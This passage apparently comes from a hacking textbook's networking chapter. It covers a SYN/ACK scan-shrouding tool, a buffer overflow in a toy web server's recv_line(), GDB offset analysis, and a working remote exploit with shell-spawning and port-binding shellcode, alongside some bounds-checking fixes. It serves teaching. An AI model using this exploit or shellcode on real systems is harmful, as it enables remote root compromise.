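This works fine for scans relying on RST packets, but preventing information leakage with SYN scans and full-connect scans is a bit more difficult. In order to maintain functionality, open ports have to respond with SYN/ACK packets; there is no way around that. But if all of the closed ports also responded with SYN/ACK packets, the amount of useful information an attacker could retrieve from port scans would be minimized. Simply opening every port would cause a major performance hit, though, which isn't desirable. Ideally, this should all be done without using a TCP stack. The following program does exactly that. It's a modification of the rst_hijack.c program, using a more complex BPF string to filter only SYN packets destined for closed ports. The callback function spoofs a legitimate-looking SYN/ACK response to any SYN packet that makes it through the BPF. This will flood port scanners with a sea of false positives, which will hide legitimate ports.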

shroud.c

#include <libnet.h>
#include <pcap.h>
#include "hacking.h"

#define MAX_EXISTING_PORTS 30

void caught_packet(u_char *, const struct pcap_pkthdr *, const u_char *);
int set_packet_filter(pcap_t *, struct in_addr *, u_short *);

struct data_pass {
   int libnet_handle; 
   u_char *packet;
};

int main(int argc, char *argv[]) {
   struct pcap_pkthdr cap_header;
   const u_char *packet, *pkt_data;
   pcap_t *pcap_handle;
   char errbuf[PCAP_ERRBUF_SIZE]; // Same size as LIBNET_ERRBUF_SIZE
   char *device; 
   u_long target_ip; 
   int network, i;
   struct data_pass critical_libnet_data;
   u_short existing_ports[MAX_EXISTING_PORTS];

   if((argc < 2) || (argc > MAX_EXISTING_PORTS+2)) {
      if(argc > 2)
         printf("Limited to tracking %d existing ports.\n", MAX_EXISTING_PORTS);
      else
         printf("Usage: %s <IP to shroud> [existing ports...]\n", argv[0]);
      exit(0);
   }

   target_ip = libnet_name_resolve(argv[1], LIBNET_RESOLVE);
   if (target_ip == -1)
      fatal("Invalid target address");

   for(i=2; i < argc; i++)
      existing_ports[i-2] = (u_short) atoi(argv[i]);

   existing_ports[argc-2] = 0;

   device = pcap_lookupdev(errbuf);
   if(device == NULL)
      fatal(errbuf);

   pcap_handle = pcap_open_live(device, 128, 1, 0, errbuf);
   if(pcap_handle == NULL)
      fatal(errbuf);

   critical_libnet_data.libnet_handle = libnet_open_raw_sock(IPPROTO_RAW);
   if(critical_libnet_data.libnet_handle == -1)
      libnet_error(LIBNET_ERR_FATAL, "can't open network interface.  -- this program must run as root.\n");

   libnet_init_packet(LIBNET_IP_H + LIBNET_TCP_H, &(critical_libnet_data.packet));
   if (critical_libnet_data.packet == NULL)
      libnet_error(LIBNET_ERR_FATAL, "can't initialize packet memory.\n");

   libnet_seed_prand();

   set_packet_filter(pcap_handle, (struct in_addr *)&target_ip, existing_ports);

   pcap_loop(pcap_handle, -1, caught_packet, (u_char *)&critical_libnet_data);
   pcap_close(pcap_handle);
}

/* Sets a packet filter to look for SYN packets sent to target_ip on ports not in the existing-ports list */
int set_packet_filter(pcap_t *pcap_hdl, struct in_addr *target_ip, u_short *ports) {
   struct bpf_program filter;
   char *str_ptr, filter_string[90 + (25 * MAX_EXISTING_PORTS)];
   int i=0;

   sprintf(filter_string, "dst host %s and ", inet_ntoa(*target_ip)); // Target IP
   strcat(filter_string, "tcp[tcpflags] & tcp-syn != 0 and tcp[tcpflags] & tcp-ack = 0");

   if(ports[0] != 0) { // If there is at least one existing port
      str_ptr = filter_string + strlen(filter_string);
      if(ports[1] == 0) // There is only one existing port
         sprintf(str_ptr, " and not dst port %hu", ports[i]);
      else { // Two or more existing ports
         sprintf(str_ptr, " and not (dst port %hu", ports[i++]);
         while(ports[i] != 0) {
            str_ptr = filter_string + strlen(filter_string);
            sprintf(str_ptr, " or dst port %hu", ports[i++]);
         }
         strcat(filter_string, ")");
      }
   }
   printf("DEBUG: filter string is \'%s\'\n", filter_string);
   if(pcap_compile(pcap_hdl, &filter, filter_string, 0, 0) == -1)
      fatal("pcap_compile failed");

   if(pcap_setfilter(pcap_hdl, &filter) == -1)
      fatal("pcap_setfilter failed");

   return 0; // The function is declared int, so return a value.
}

void caught_packet(u_char *user_args, const struct pcap_pkthdr *cap_header, const u_char *packet) {
   u_char *pkt_data;
   struct libnet_ip_hdr *IPhdr;
   struct libnet_tcp_hdr *TCPhdr;
   struct data_pass *passed;
   int bcount;

   passed = (struct data_pass *) user_args; // Pass data using a pointer to a struct

   IPhdr = (struct libnet_ip_hdr *) (packet + LIBNET_ETH_H);
   // The TCP header follows the IP header (assumes no IP options).
   TCPhdr = (struct libnet_tcp_hdr *) (packet + LIBNET_ETH_H + LIBNET_IP_H);

   libnet_build_ip(LIBNET_TCP_H,      // Size of the packet sans IP header 
      IPTOS_LOWDELAY,                 // IP tos 
      libnet_get_prand(LIBNET_PRu16), // IP ID (randomized) 
      0,                              // Frag stuff 
      libnet_get_prand(LIBNET_PR8),   // TTL (randomized) 
      IPPROTO_TCP,                    // Transport protocol 
      *((u_long *)&(IPhdr->ip_dst)),  // Source IP (pretend we are dst) 
      *((u_long *)&(IPhdr->ip_src)),  // Destination IP (send back to src) 
      NULL,                           // Payload (none) 
      0,                              // Payload length 
      passed->packet);                // Packet header memory 

   libnet_build_tcp(ntohs(TCPhdr->th_dport),// Source TCP port (pretend we are dst)
      ntohs(TCPhdr->th_sport),        // Destination TCP port (send back to src)
      ntohl(TCPhdr->th_ack),          // Sequence number (use previous ack)
      ntohl(TCPhdr->th_seq) + 1,      // Acknowledgement number (SYN's seq # + 1)
      TH_SYN | TH_ACK,                // Control flags (SYN and ACK flags set)
      libnet_get_prand(LIBNET_PRu16), // Window size (randomized) 
      0,                              // Urgent pointer
      NULL,                           // Payload (none)
      0,                              // Payload length 
      (passed->packet) + LIBNET_IP_H);// Packet header memory 

   if (libnet_do_checksum(passed->packet, IPPROTO_TCP, LIBNET_TCP_H) == -1)
      libnet_error(LIBNET_ERR_FATAL, "can't compute checksum\n");

   bcount = libnet_write_ip(passed->libnet_handle, passed->packet, LIBNET_IP_H+LIBNET_TCP_H);
   if (bcount < LIBNET_IP_H + LIBNET_TCP_H)
      libnet_error(LIBNET_ERR_WARNING, "Warning: Incomplete packet written.");
   printf("bing!\n"); 
}

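There are a few tricky parts in the code above, but you should be able to follow all of it. When the program is compiled and executed, it will shroud the IP address given as the first argument, with the exception of a list of existing ports provided as the remaining arguments.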

reader@hacking:~/booksrc $ gcc $(libnet-config --defines) -o shroud shroud.c -lnet -lpcap
reader@hacking:~/booksrc $ sudo ./shroud 192.168.42.72 22 80
DEBUG: filter string is 'dst host 192.168.42.72 and tcp[tcpflags] & tcp-syn != 0 and
tcp[tcpflags] & tcp-ack = 0 and not (dst port 22 or dst port 80)'
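The filter string shown in the DEBUG line is assembled with sprintf() and strcat() into a buffer sized by hand. As an alternative sketch (not the book's code), the hypothetical helper below builds the same expression with snprintf(), which is told how much room is left and reports when the string would not fit. One deliberate difference: it always wraps the port list in parentheses, even for a single port, which is an equivalent BPF expression.

```c
#include <stdio.h>
#include <string.h>

/* Builds the shroud BPF expression into buf (size bytes). ports is a
 * zero-terminated list, as in shroud.c. Returns 0 on success, or -1 if
 * the expression does not fit in buf. */
int build_shroud_filter(char *buf, size_t size, const char *ip,
                        const unsigned short *ports) {
   size_t used;
   int n, i;

   n = snprintf(buf, size, "dst host %s and tcp[tcpflags] & tcp-syn != 0"
                " and tcp[tcpflags] & tcp-ack = 0", ip);
   if (n < 0 || (size_t)n >= size)
      return -1; /* Truncated or failed */
   used = (size_t)n;

   for (i = 0; ports[i] != 0; i++) {
      const char *prefix = (i == 0) ? " and not (dst port " : " or dst port ";

      n = snprintf(buf + used, size - used, "%s%hu", prefix, ports[i]);
      if (n < 0 || (size_t)n >= size - used)
         return -1;
      used += (size_t)n;
   }

   if (i > 0) { // Close the parenthesis opened for the first port.
      if (size - used < 2)
         return -1;
      strcpy(buf + used, ")");
   }
   return 0;
}
```

For the address 192.168.42.72 and ports 22 and 80, this produces the same string as the DEBUG output above.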

While shroud is running, any port scanning attempts will show every port to be open.

matrix@euclid:~ $ sudo nmap -sS 192.168.0.189

Starting nmap V. 3.00 ( www.insecure.org/nmap/ )
Interesting ports on  (192.168.0.189):
Port       State       Service
1/tcp      open        tcpmux
2/tcp      open        compressnet
3/tcp      open        compressnet
4/tcp      open        unknown
5/tcp      open        rje
6/tcp      open        unknown
7/tcp      open        echo
8/tcp      open        unknown
9/tcp      open        discard
10/tcp     open        unknown
11/tcp     open        systat
12/tcp     open        unknown
13/tcp     open        daytime
14/tcp     open        unknown
15/tcp     open        netstat
16/tcp     open        unknown
17/tcp     open        qotd
18/tcp     open        msp
19/tcp     open        chargen
20/tcp     open        ftp-data
21/tcp     open        ftp
22/tcp     open        ssh
23/tcp     open        telnet
24/tcp     open        priv-mail
25/tcp     open        smtp

[ output trimmed ]

32780/tcp  open        sometimes-rpc23
32786/tcp  open        sometimes-rpc25
32787/tcp  open        sometimes-rpc27
43188/tcp  open        reachout
44442/tcp  open        coldfusion-auth
44443/tcp  open        coldfusion-auth
47557/tcp  open        dbbrowse
49400/tcp  open        compaqdiag
54320/tcp  open        bo2k
61439/tcp  open        netprowler-manager
61440/tcp  open        netprowler-manager2
61441/tcp  open        netprowler-sensor
65301/tcp  open        pcanywhere

Nmap run completed -- 1 IP address (1 host up) scanned in 37 seconds 
matrix@euclid:~ $

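The only service that is actually running is ssh on port 22, but it is hidden in a sea of false positives. A dedicated attacker could simply telnet to every port to check the banners, but this technique could easily be expanded to spoof banners also.

Reach Out and Hack Someone

Network programming tends to move many chunks of memory around and is heavy in typecasting. You've seen for yourself how crazy some of the typecasts can get. Mistakes thrive in this type of chaos. And since many network programs need to run as root, these little mistakes can become critical vulnerabilities. One such vulnerability exists in the code from this chapter. Did you notice it?

From hacking-network.h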

/* This function accepts a socket FD and a ptr to a destination
 * buffer.  It will receive from the socket until the EOL byte
 * sequence is seen.  The EOL bytes are read from the socket, but
 * the destination buffer is terminated before these bytes.
 * Returns the size of the read line (without EOL bytes).
 */
int recv_line(int sockfd, unsigned char *dest_buffer) {
#define EOL "\r\n" // End-of-line byte sequence
#define EOL_SIZE 2
   unsigned char *ptr;
   int eol_matched = 0;

   ptr = dest_buffer;

   while(recv(sockfd, ptr, 1, 0) == 1) { // Read a single byte.
      if(*ptr == EOL[eol_matched]) { // Does this byte match terminator?
         eol_matched++;
         if(eol_matched == EOL_SIZE) { // If all bytes match terminator,
            *(ptr+1-EOL_SIZE) = '\0'; // terminate the string.
            return strlen(dest_buffer); // Return bytes received.
         }
      } else {
         eol_matched = 0;
      }
      ptr++; // Increment the pointer to the next byte.
   }
   return 0; // Didn't find the end-of-line characters. 
}

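The recv_line() function in hacking-network.h has a small mistake of omission: there is no code to limit the length. This means that received bytes can overflow the buffer if they exceed the size of dest_buffer. The tinyweb server program and any other programs that use this function are vulnerable to attack.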
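To make the omission concrete, here is a minimal sketch of what a length-limited version might look like. It is not the book's code: the name recv_line_bounded and the extra dest_size parameter are assumptions added for illustration, and unlike recv_line() it returns -1 rather than 0 when no complete line is read.

```c
#include <stddef.h>
#include <sys/types.h>
#include <sys/socket.h>

/* Hypothetical bounded variant of recv_line(). The dest_size parameter
 * (capacity of dest_buffer in bytes) is an addition for illustration.
 * Returns the line length without the EOL bytes, or -1 if the line does
 * not fit, the peer closes early, or recv() fails. */
int recv_line_bounded(int sockfd, unsigned char *dest_buffer, size_t dest_size) {
   static const unsigned char eol[] = { '\r', '\n' };
   const size_t eol_size = sizeof(eol);
   size_t used = 0;        /* Bytes stored so far. */
   size_t eol_matched = 0; /* How much of the terminator has matched. */

   if (dest_buffer == NULL || dest_size == 0)
      return -1;

   /* Never store a byte at or beyond dest_buffer[dest_size]. */
   while (used < dest_size && recv(sockfd, dest_buffer + used, 1, 0) == 1) {
      if (dest_buffer[used] == eol[eol_matched]) {
         eol_matched++;
         if (eol_matched == eol_size) {
            size_t line_len = used + 1 - eol_size;
            dest_buffer[line_len] = '\0'; /* Terminate before the EOL bytes. */
            return (int)line_len;
         }
      } else {
         eol_matched = 0;
      }
      used++;
   }
   dest_buffer[0] = '\0'; /* Leave an empty string on failure. */
   return -1;
}
```

A caller such as handle_connection() would pass sizeof(request) as the third argument and treat a negative return value as a malformed request.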

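Analysis with GDB

To exploit the vulnerability in the tinyweb.c program, we simply need to send packets that will strategically overwrite the return address. First, we need to know the offset from the start of a buffer we control to the stored return address. Using GDB, we can analyze the compiled program to find this offset; however, there are some subtle details that can cause tricky problems. For example, the program requires root privileges, so the debugger must be run as root. But using sudo or running with root's environment will change the stack, meaning the addresses seen when the debugger runs the binary won't match the addresses when it runs normally. There are other slight differences that can shift memory around in the debugger like this, creating inconsistencies that are hard to track down. According to the debugger, everything will look like it should work; however, the exploit fails when run outside of the debugger, since the addresses are different.

One elegant solution to this problem is to attach to a process that is already running. In the output below, GDB is used to attach to an already-running tinyweb process that was started in another terminal. The source is recompiled using the -g option to include debugging symbols that GDB can apply to the running process.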

reader@hacking:~/booksrc $ ps aux | grep tinyweb
root     13019  0.0  0.0   1504   344 pts/0    S+   20:25   0:00 ./tinyweb
reader   13104  0.0  0.0   2880   748 pts/2    R+   20:27   0:00 grep tinyweb
reader@hacking:~/booksrc $ gcc -g tinyweb.c 
reader@hacking:~/booksrc $ sudo gdb -q --pid=13019 --symbols=./a.out
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
Attaching to process 13019
/cow/home/reader/booksrc/tinyweb: No such file or directory.
A program is being debugged already.  Kill it? (y or n) n
Program not killed.
(gdb) bt
#0  0xb7fe77f2 in ?? ()
#1  0xb7f691e1 in ?? ()
#2  0x08048ccf in main () at tinyweb.c:44
(gdb) list 44
39         if (listen(sockfd, 20) == -1)
40            fatal("listening on socket");
41
42         while(1) {   // Accept loop
43            sin_size = sizeof(struct sockaddr_in);
44            `new_sockfd = accept(sockfd, (struct sockaddr *)&client_addr, &sin_size);`
45            if(new_sockfd == -1)
46               fatal("accepting connection");
47
48            handle_connection(new_sockfd, &client_addr);
(gdb) list handle_connection
53      /* This function handles the connection on the passed socket from the
54       * passed client address.  The connection is processed as a web request
55       * and this function replies over the connected socket.  Finally, the 
56       * passed socket is closed at the end of the function.
57       */
58      void handle_connection(int sockfd, struct sockaddr_in *client_addr_ptr) {
59         unsigned char *ptr, request[500], resource[500];
60         int fd, length;
61
62         length = recv_line(sockfd, request);
(gdb) break 62
Breakpoint 1 at 0x8048d02: file tinyweb.c, line 62.
(gdb) cont 
Continuing.

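After attaching to the running process, a stack backtrace shows the program is currently in main(), waiting for a connection. After a breakpoint is set at the first recv_line() call on line 62, the program is allowed to continue. At this point, the program's execution must be advanced by making a web request using wget or a browser in another terminal. Then the breakpoint in handle_connection() will be hit.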

Breakpoint 2, handle_connection (sockfd=4, client_addr_ptr=0xbffff810) at tinyweb.c:62
62         length = recv_line(sockfd, request);
(gdb) x/x request 
0xbffff5c0:     0x00000000
(gdb) bt
#0  handle_connection (sockfd=4, client_addr_ptr=0xbffff810) at tinyweb.c:62
#1  0x08048cf6 in main () at tinyweb.c:48
(gdb) x/16xw request+500
0xbffff7b4:     0xb7fd5ff4      0xb8000ce0      0x00000000      0xbffff848
0xbffff7c4:     0xb7ff9300      0xb7fd5ff4      0xbffff7e0      0xb7f691c0
0xbffff7d4:     0xb7fd5ff4      0xbffff848      0x08048cf6      0x00000004
0xbffff7e4:     0xbffff810      0xbffff80c      0xbffff834      0x00000004
(gdb) x/x 0xbffff7d4+8
0xbffff7dc:     0x08048cf6
(gdb) p 0xbffff7dc - 0xbffff5c0
$1 = 540
(gdb) p /x 0xbffff5c0 + 200
$2 = 0xbffff688
(gdb) quit
The program is running.  Quit anyway (and detach it)? (y or n) y
Detaching from program: , process 13019 
reader@hacking:~/booksrc $

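At the breakpoint, the request buffer begins at 0xbffff5c0. The bt command's stack backtrace shows that the return address from handle_connection() is 0x08048cf6. Since we know how local variables are generally laid out on the stack, we know the request buffer is near the end of the frame. This means that the stored return address should be on the stack somewhere near the end of this 500-byte buffer. Since we already know the general area to look in, a quick inspection shows the stored return address is at 0xbffff7dc. A little math shows the stored return address is 540 bytes from the start of the request buffer. However, a few bytes near the beginning of the buffer might be mangled by the rest of the function. Remember, we don't gain control of the program until the function returns. To account for this, it's best to just avoid the beginning of the buffer. Skipping the first 200 bytes should be safe, while leaving plenty of space for shellcode in the remaining 300 bytes. This means 0xbffff688 is the target return address.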
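The two GDB print commands in that session are plain pointer arithmetic. As a rough sketch (the function names are invented for illustration and appear nowhere in the book's source), the same calculation in C looks like this:

```c
#include <stdint.h>

/* Distance in bytes from the start of a buffer to a higher stack address,
 * such as the slot holding the saved return address. */
uint32_t offset_from_buffer(uint32_t buffer_start, uint32_t slot_addr) {
   return slot_addr - buffer_start;
}

/* Address reached after skipping `skip` bytes from the start of a buffer. */
uint32_t address_after_skip(uint32_t buffer_start, uint32_t skip) {
   return buffer_start + skip;
}
```

With the values from the session, offset_from_buffer(0xbffff5c0, 0xbffff7dc) gives 540 and address_after_skip(0xbffff5c0, 200) gives 0xbffff688, matching $1 and $2 in the GDB output.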

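Almost Only Counts with Hand Grenades

The following exploit for the tinyweb program uses the offset and return address overwrite values calculated with GDB. It fills the exploit buffer with null bytes, so anything written into it will automatically be null-terminated. Then it fills the first 540 bytes with NOP instructions. This builds the NOP sled and fills the buffer up to the return address overwrite location. The return address is written at offset 540, and the shellcode is copied into the sled at offset 300. Then the entire string is terminated with the '\r\n' line terminator.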

tinyweb_exploit.c

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>

#include "hacking.h"
#include "hacking-network.h"

char shellcode[]=
"\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68"
"\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89"
"\xe1\xcd\x80";  // Standard shellcode

#define OFFSET 540
#define RETADDR 0xbffff688

int main(int argc, char *argv[]) {
   int sockfd, buflen;
   struct hostent *host_info;
   struct sockaddr_in target_addr;
   unsigned char buffer[600];

   if(argc < 2) {
      printf("Usage: %s <hostname>\n", argv[0]);
      exit(1);
   }

   if((host_info = gethostbyname(argv[1])) == NULL)
      fatal("looking up hostname");

   if ((sockfd = socket(PF_INET, SOCK_STREAM, 0)) == -1)
      fatal("in socket");

   target_addr.sin_family = AF_INET;
   target_addr.sin_port = htons(80);
   target_addr.sin_addr = *((struct in_addr *)host_info->h_addr);
   memset(&(target_addr.sin_zero), '\0', 8); // Zero the rest of the struct.

   if (connect(sockfd, (struct sockaddr *)&target_addr, sizeof(struct sockaddr)) == -1)
      fatal("connecting to target server");

   bzero(buffer, 600);                      // Zero out the buffer.
   memset(buffer, '\x90', OFFSET);          // Build a NOP sled.
   *((u_int *)(buffer + OFFSET)) = RETADDR; // Put the return address in
   memcpy(buffer+300, shellcode, strlen(shellcode)); // shellcode.
   strcat(buffer, "\r\n");                  // Terminate the string.
   printf("Exploit buffer:\n");
   dump(buffer, strlen(buffer));  // Show the exploit buffer.
   send_string(sockfd, buffer);   // Send exploit buffer as an HTTP request.

   exit(0);
}

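When this program is compiled, it can remotely exploit hosts running the tinyweb program, tricking them into running the shellcode. The exploit also dumps out the bytes of the exploit buffer before sending it. In the output below, the tinyweb program is run in a different terminal, and the exploit is tested against it. Here's the output from the attacker's terminal: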

reader@hacking:~/booksrc $ gcc tinyweb_exploit.c 
reader@hacking:~/booksrc $ ./a.out 127.0.0.1
Exploit buffer:
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 | ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 | ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 | ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 | ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 | ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 | ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 | ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 | ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 | ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 | ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 | ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 | ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 | ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 | ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 | ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 | ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 | ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 | ................
90 90 90 90 90 90 90 90 90 90 90 90 31 c0 31 db | ............1.1.
31 c9 99 b0 a4 cd 80 6a 0b 58 51 68 2f 2f 73 68 | 1......j.XQh//sh
68 2f 62 69 6e 89 e3 51 89 e2 53 89 e1 cd 80 90 | h/bin..Q..S.....
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 | ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 | ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 | ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 | ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 | ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 | ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 | ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 | ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 | ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 | ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 | ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 | ................
90 90 90 90 90 90 90 90 90 90 90 90 88 f6 ff bf | ................
0d 0a                                           | .. 
reader@hacking:~/booksrc $

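Back on the terminal running the tinyweb program, the output shows that the exploit buffer was received and the shellcode was executed. This provides a root shell, but only on the console running the server. Unfortunately, we aren't at the console, so this won't do us any good. At the server console, we see the following: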

reader@hacking:~/booksrc $ ./tinyweb
Accepting web requests on port 80
Got request from 127.0.0.1:53908 "GET / HTTP/1.1"
        Opening './webroot/index.html'   200 OK
Got request from 127.0.0.1:40668 "GET /image.jpg HTTP/1.1"
        Opening './webroot/image.jpg'    200 OK
Got request from 127.0.0.1:58504 
"␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣
␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣
␣␣␣␣␣␣␣␣␣␣␣␣␣␣1␣ 1␣ 1␣␣␣  j

                                         XQh//shh/bin␣␣S ␣␣␣␣␣␣␣␣␣␣␣␣
␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣
␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣␣"
 NOT HTTP! 
sh-3.2#

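The vulnerability certainly exists, but the shellcode doesn't do what we want in this case. Since we're not at the console, a locally spawned shell is useless to us. Shellcode is just a self-contained program, designed to take over another program to open a shell. Once control of the program's execution pointer is taken, the injected shellcode can do anything. There are many different types of shellcode (or payloads) that can be used in different situations. Even though not all shellcode actually spawns a shell, it's still commonly called shellcode.

Port-Binding Shellcode

When exploiting a remote program, spawning a shell locally is pointless. Port-binding shellcode listens for a TCP connection on a certain port and serves up the shell remotely. Assuming you already have port-binding shellcode ready, using it is simply a matter of replacing the shellcode bytes defined in the exploit. Port-binding shellcode that binds to port 31337 is included on the LiveCD. These shellcode bytes are shown in the output below.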

reader@hacking:~/booksrc $ wc -c portbinding_shellcode
92 portbinding_shellcode
reader@hacking:~/booksrc $ hexdump -C portbinding_shellcode
00000000  6a 66 58 99 31 db 43 52  6a 01 6a 02 89 e1 cd 80  |jfX.1.CRj.j.....|
00000010  96 6a 66 58 43 52 66 68  7a 69 66 53 89 e1 6a 10  |.jfXCRfhzifS..j.|
00000020  51 56 89 e1 cd 80 b0 66  43 43 53 56 89 e1 cd 80  |QV.....fCCSV....|
00000030  b0 66 43 52 52 56 89 e1  cd 80 93 6a 02 59 b0 3f  |.fCRRV.....j.Y.?|
00000040  cd 80 49 79 f9 b0 0b 52  68 2f 2f 73 68 68 2f 62  |..Iy...Rh//shh/b|
00000050  69 6e 89 e3 52 89 e2 53  89 e1 cd 80              |in..R..S....|
0000005c
reader@hacking:~/booksrc $ od -tx1 portbinding_shellcode | cut -c8-80 | sed -e 's/ /\\x/g'
\x6a\x66\x58\x99\x31\xdb\x43\x52\x6a\x01\x6a\x02\x89\xe1\xcd\x80
\x96\x6a\x66\x58\x43\x52\x66\x68\x7a\x69\x66\x53\x89\xe1\x6a\x10
\x51\x56\x89\xe1\xcd\x80\xb0\x66\x43\x43\x53\x56\x89\xe1\xcd\x80
\xb0\x66\x43\x52\x52\x56\x89\xe1\xcd\x80\x93\x6a\x02\x59\xb0\x3f
\xcd\x80\x49\x79\xf9\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62
\x69\x6e\x89\xe3\x52\x89\xe2\x53\x89\xe1\xcd\x80

reader@hacking:~/booksrc $
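The od, cut, and sed pipeline above only reformats raw bytes as \x escapes so they can be pasted into a C string literal. For readers who would rather do this in C, here is a small sketch; the function name format_hex_escapes is invented for illustration and is not part of the book's toolset.

```c
#include <stddef.h>
#include <stdio.h>

/* Render each byte of data as a four-character \xNN escape in out.
 * Returns the number of characters written (not counting the NUL),
 * or -1 if out is too small to hold the result. */
int format_hex_escapes(const unsigned char *data, size_t len,
                       char *out, size_t out_size) {
   size_t i;

   if (out == NULL || out_size < len * 4 + 1)
      return -1;

   out[0] = '\0'; /* Valid empty string when len is 0. */
   for (i = 0; i < len; i++)
      snprintf(out + i * 4, 5, "\\x%02x", data[i]); /* 4 chars + NUL */

   return (int)(len * 4);
}
```

Passing the first four bytes of the file (6a 66 58 99) produces the text \x6a\x66\x58\x99, the same as the start of the first line printed by the pipeline.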

After some quick formatting, these bytes are swapped into the shellcode bytes of the tinyweb_exploit.c program, resulting in tinyweb_exploit2.c. The new shellcode line is shown below.

New Line from tinyweb_exploit2.c

char shellcode[]=
"\x6a\x66\x58\x99\x31\xdb\x43\x52\x6a\x01\x6a\x02\x89\xe1\xcd\x80"
"\x96\x6a\x66\x58\x43\x52\x66\x68\x7a\x69\x66\x53\x89\xe1\x6a\x10"
"\x51\x56\x89\xe1\xcd\x80\xb0\x66\x43\x43\x53\x56\x89\xe1\xcd\x80"
"\xb0\x66\x43\x52\x52\x56\x89\xe1\xcd\x80\x93\x6a\x02\x59\xb0\x3f"
"\xcd\x80\x49\x79\xf9\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62"
"\x69\x6e\x89\xe3\x52\x89\xe2\x53\x89\xe1\xcd\x80";
// Port-binding shellcode on port 31337

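When this exploit is compiled and run against a host running the tinyweb server, the shellcode listens on port 31337 for a TCP connection. In the output below, a program called nc is used to connect to the shell. This program is netcat (nc for short), which works like the cat program but over the network. We can't just use telnet to connect, since it automatically terminates all outgoing lines with '\r\n'. The output of this exploit is shown below. The -vv command-line option passed to netcat just makes it more verbose.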

reader@hacking:~/booksrc $ gcc tinyweb_exploit2.c 
reader@hacking:~/booksrc $ ./a.out 127.0.0.1
Exploit buffer:
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 | ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 | ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 | ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 | ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 | ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 | ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 | ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 | ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 | ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 | ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 | ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 | ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 | ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 | ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 | ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 | ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 | ................
90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 | ................
90 90 90 90 90 90 90 90 90 90 90 90 6a 66 58 99 | ............jfX.
31 db 43 52 6a 01 6a 02 89 e1 cd 80 96 6a 66 58 | 1.CRj.j......jfX
43 52 66 68 7a 69 66 53 89 e1 6a 10 51 56 89 e1 | CRfhzifS..j.QV..
cd 80 b0 66 43 43 53 56 89 e1 cd 80 b0 66 43 52 | ...fCCSV.....fCR
52 56 89 e1 cd 80 93 6a 02 59 b0 3f cd 80 49 79 | RV.....j.Y.?..Iy
